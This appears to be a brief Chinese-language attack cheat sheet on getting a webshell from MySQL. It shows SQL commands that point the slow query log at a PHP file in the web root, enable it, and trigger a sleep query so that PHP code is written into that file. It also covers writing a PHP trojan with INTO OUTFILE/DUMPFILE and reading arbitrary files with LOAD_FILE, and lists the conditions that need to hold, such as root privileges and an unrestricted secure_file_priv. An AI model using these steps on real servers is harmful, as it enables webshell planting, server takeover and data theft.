Mysql慢日志getshell

show variables like '%slow%';

Variable_name     Value
log_slow_queries     OFF
slow_launch_time     2
slow_query_log     OFF
slow_query_log_file     C:\phpStudy\PHPTutorial\MySQL\data\WIN-374NAWYudt-slow.log

set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
set GLOBAL slow_query_log=on;

/*set GLOBAL log_queries_not_using_indexes=on;
show variables like '%log%';*/

select '<?php phpinfo();?>' from mysql.db where sleep(10);
慢日志是默认10秒响应则写入

慢日志getshell、日志getshell，都要配合文件包含，因为日志后缀为.log

mysql通过sql语句 into outfile/dumpfile,（dumpfile是用于二进制文件）写入php木马，通过load_file读取文件

select '<?php phpinfo(); ?>' into outfile  '目的文件'  
select load_file('要读取文件路径')

sql文件读写前提

用户权限足够高，尽量具有root权限。
secure_file_priv 选项不对文件读写权限限制
知道绝对物理路径
能够使用联合查询（sql注入时）